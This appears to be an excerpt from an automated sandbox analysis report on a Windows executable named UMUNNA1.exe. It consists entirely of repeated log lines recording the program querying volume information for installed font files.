Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\UMUNNA1.exe	Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation	Jump to behavior
